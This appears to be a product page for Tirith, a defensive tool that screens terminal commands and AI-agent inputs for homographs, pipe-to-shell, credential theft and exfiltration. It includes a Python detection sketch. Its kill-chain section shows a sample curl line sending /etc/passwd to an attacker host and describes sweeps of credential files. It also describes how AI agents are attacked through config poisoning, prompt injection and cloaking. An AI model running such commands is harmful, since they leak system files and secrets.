Your terminal won't.
Tirith intercepts commands and pastes in your terminal, detecting homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, data exfiltration, and 200+ other threats, in under 1ms.
What It Catches
208 detection rules across 29 threat categories, covering every angle of terminal and AI-agent attack surface.
Hostname & Homograph
Homograph attacks, punycode, confusable characters, IDN spoofing
Terminal Injection
ANSI escapes, bidi overrides, zero-width and control characters
Command Execution
Pipe-to-shell, decode-execute, command substitution, and dangerous invocations
Credential Detection
API keys, tokens, private keys, and high-entropy secrets in input
Supply Chain & Ecosystem
Git, Docker, pip, npm, registries — package and supply-chain attack surface
Config Security
AI config poisoning, prompt injection, and MCP server validation
AI Config Drift
Snapshot-diff changes to AI configs: hidden instructions and tool-use escalation
Threat Intelligence
Known-malicious packages, URLs, and IPs from the signed threat database
Code Execution
Executing from tmp/untrusted locations and dynamic or obfuscated execution
Contextual Safety
Production cloud/k8s, labeled SSH hosts, IaC apply/destroy, and container exec
Hidden Content
Hidden CSS/color text, comments, and notebook/HTML hidden instructions
Cloaking
Servers returning different content to AI bots vs browsers
Supply Chain Is the New Attack Surface
TeamPCP compromised LiteLLM, Aqua Trivy, and Checkmarx in 5 days. No zero-day needed, just stolen credentials and commands your terminal happily executed.
Tirith won't stop a trojaned package from being installed. But it catches the payload before it does damage, cutting the blast radius at every stage of the kill chain.
Initial Access
Attack
Stolen credentials used to push trojaned package
LiteLLM, Aqua Trivy, Checkmarx, all in 5 days
Tirith Response
Outside terminal scope. Tirith guards what runs after install.
Credential Harvesting
Attack
Payload exports API keys, tokens, and secrets from env vars
$AWS_SECRET_ACCESS_KEY, $GITHUB_TOKEN, $ANTHROPIC_API_KEY
Tirith Response
sensitive_env_export
Memory Scraping
Attack
Reads /proc/*/mem to extract secrets from running processes
Every secret in your CI runner or dev machine memory
Tirith Response
proc_mem_access
Privilege Escalation
Attack
Mounts host root filesystem via Docker remote daemon
Full host access from inside a container
Tirith Response
docker_remote_priv_esc
Persistence
Attack
Sweeps .aws/credentials, .ssh/id_rsa, .gnupg/ for lateral movement
Every credential file on disk
Tirith Response
credential_file_sweep
Exfiltration
Attack
Uploads stolen data to attacker-controlled server via curl
curl -d @/etc/passwd https://c2.attacker.com/collect
Tirith Response
data_exfiltration
5 of 6 kill chain stages intercepted
Tirith can't prevent a compromised package from being published. But every post-install payload (credential theft, memory scraping, privilege escalation, exfiltration) gets caught before it does damage. That's the difference between a breach and a blocked command.
How It Works
A 3-tier pipeline that balances speed with thoroughness.
Fast Gate
Regex-powered initial filter eliminates 99% of clean commands instantly.
Extract
Parses URLs, Docker references, and package identifiers from complex commands.
Analyze
200+ rules across 29 categories: homographs, injection, supply-chain, threat intel, credential detection, AI-config drift, and more.
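The three tiers above, sketched as an added example. This is not Tirith's code: the regexes, helper names and finding names are assumptions made for illustration and are not Tirith rule IDs. It runs a cheap gate, extracts URLs, then applies a few checks for homograph hosts, terminal control characters and pipe-to-shell.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Tier 1 (fast gate): one cheap regex; input that trips nothing exits immediately.
FAST_GATE = re.compile(r"[^\x00-\x7f]|\x1b|https?://|\|\s*(?:ba|z|da)?sh\b")
# Tier 2 (extract) pulls URLs; tier 3 (analyze) applies the patterns below.
URL_RE = re.compile(r"https?://[^\s'\"|;<>]+")
ANSI_RE = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")  # CSI escape sequences
PIPE_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
BIDI = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
ZERO_WIDTH = set("\u200b\u200c\u200d\u2060\ufeff")

def scripts(label):
    """Approximate the scripts in a hostname label from Unicode character names."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}

def host_findings(url):
    """Flag punycode labels and labels that mix scripts (e.g. Latin + Cyrillic)."""
    try:
        host = urlsplit(url).hostname or ""
    except ValueError:  # malformed netloc: nothing to inspect
        return set()
    found = set()
    for label in host.split("."):
        if label.startswith("xn--"):
            found.add("punycode_host")
        if len(scripts(label)) > 1:
            found.add("mixed_script_host")
    return found

def analyze(text):
    """Return sorted finding names (made up for this sketch, not Tirith rule IDs)."""
    if not FAST_GATE.search(text):      # tier 1: clean input stops here
        return []
    found, chars = set(), set(text)
    for url in URL_RE.findall(text):    # tier 2: extract, then check each host
        found |= host_findings(url)
    checks = {                          # tier 3: remaining rules
        "ansi_escape": ANSI_RE.search(text),
        "bidi_override": BIDI & chars,
        "zero_width_char": ZERO_WIDTH & chars,
        "pipe_to_shell": PIPE_SHELL_RE.search(text),
    }
    return sorted(found | {name for name, hit in checks.items() if hit})

# Constructed sample: \u0456 is a Cyrillic letter that looks like Latin "i".
SAMPLE = "curl -fsSL https://g\u0456thub.example/install.sh | bash"
print(analyze(SAMPLE))
```

The gate only decides whether the later tiers run: a plain download URL trips it, yet still comes back with no findings.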
AI Agent Security
Protect AI coding agents at every layer, from the configs they read to the skills they download to the commands they execute. One command to set up. Zero friction on clean input.
MCP Server: 7 Tools
AI agents call these tools before taking action. Run tirith mcp-server to start.
tirith_check_command
Analyze shell commands
tirith_check_url
Score URLs for attacks
tirith_check_paste
Check pasted content
tirith_scan_file
Scan files for hidden content
tirith_scan_directory
Recursive directory scan
tirith_verify_mcp_config
Validate MCP configs
tirith_fetch_cloaking
Detect server-side cloaking
Skill & Plugin Scanning
Download skills, plugins, and MCP tools without worrying. Tirith scans every file for obfuscated payloads, dynamic code execution, and secret exfiltration before your agent runs it.
Config Poisoning
Scans 50+ AI config file patterns (.cursorrules, CLAUDE.md, .mcp.json, and more) for prompt injection, invisible Unicode, and permission bypass attempts.
Hidden Content
Detects content invisible to humans but readable by AI: CSS hiding, color tricks, sub-pixel PDF text, and HTML comment injection.
Server Cloaking
Compares responses across 6 user-agents to catch servers that serve different content to AI bots vs browsers.
AI Config Drift
Snapshot your AI configs, then diff to catch hidden instructions or tool-use escalation slipped in since — via tirith ai snapshot and tirith ai diff.
Editor Diagnostics (LSP)
tirith lsp publishes findings inline in your editor as you open and edit AI configs, install docs, and source files.
One Command Setup
Commands
Everything runs locally. Zero network calls unless you explicitly ask.
Analyze
| Command | Description |
| --- | --- |
| tirith check -- <cmd> | Analyze a command without executing it |
| tirith paste | Check pasted content (auto-called by shell hooks) |
| tirith scan [path] | Scan files/dirs for hidden content, config poisoning, malicious code. Supports --sarif and --ci --fail-on high |
| tirith run <url> | Safe curl\|bash replacement. Downloads, analyzes, shows SHA256, opens for review, executes after confirmation |
| tirith explain --rule <id> | Docs, examples, and remediation for any of the 200+ rule IDs |
Investigate
| Command | Description |
| --- | --- |
| tirith score <url> | Break down a URL's trust signals |
| tirith diff <url> | Byte-level comparison showing where suspicious characters hide |
| tirith fetch <url> | Detect server-side cloaking (different content for bots vs browsers) |
| tirith why | Explain the last rule that triggered |
AI & Editor
| Command | Description |
| --- | --- |
| tirith ai | Snapshot and diff AI configs for hidden-instruction & tool-use drift (scan, diff, quarantine, snapshot) |
| tirith lsp | Language Server for inline editor diagnostics as you edit configs, docs, and code |
| tirith mcp-server | Run as MCP server over JSON-RPC stdio (7 tools) |
| tirith setup <tool> | One-command setup for Claude Code, Codex, Cursor, VS Code, Windsurf |
| tirith gateway run | MCP gateway proxy for intercepting AI agent shell tool calls |
Policy & Trust
| Command | Description |
| --- | --- |
| tirith onboard | Detect your repo and environment, then recommend a policy template |
| tirith policy | Scaffold, validate, test, and tune .tirith/policy.yaml (init, validate, test, tune) |
| tirith rule | Author custom regex or semantic when:-DSL detection rules (test, validate, explain) |
| tirith trust | Manage trusted patterns, narrow + 30-day TTL by default (add, list, explain, gc) |
| tirith threat-db | Update and query the signed threat database (update, status, explain, sources) |
Operate
| Command | Description |
| --- | --- |
| tirith receipt | Track and verify scripts run through tirith run (last, list, verify) |
| tirith checkpoint | Snapshot files before risky operations, roll back if needed (create, restore, diff) |
| tirith dashboard | Local security dashboard from the audit log (export, serve) |
| tirith audit | Audit log management for compliance (export, stats, report) |
| tirith doctor | Diagnostics for hooks, policy, and setup (--quick, --fix, --compat) |
| tirith init | Print the shell hook for your shell profile |
Free for Everyone. Built for Teams.
All detection rules run at every tier. Paid plans add compliance, policy distribution, and enterprise integrations.
Community
Free forever
Everything you need for terminal security. No account required.
- ✓ Full detection engine (all 200+ rules)
- ✓ Shell hooks: Bash, Zsh, Fish, PowerShell
- ✓ MCP server for AI coding tools
- ✓ Local JSONL audit log
- ✓ YAML policy system
- ✓ SARIF output for CI/CD
- ✓ Zero network calls, fully offline
- ✓ Cross-platform: macOS, Linux, Windows
- ✓ Open source
Team / Enterprise
Contact us
Everything in Community, plus:
- MITRE ATT&CK technique mapping
- Remote policy distribution
- Centralized audit log collection
- Custom DLP redaction patterns
- Webhooks: Slack, Teams, PagerDuty
- SSO/SAML: Okta, Azure AD
- Air-gapped / on-premises deployment
- Dedicated account manager & SLA
Installation
Install Tirith with your favorite package manager.
brew install sheeki03/tap/tirith
Shell Activation
eval "$(tirith init --shell zsh)"
eval "$(tirith init --shell bash)"
tirith init --shell fish | source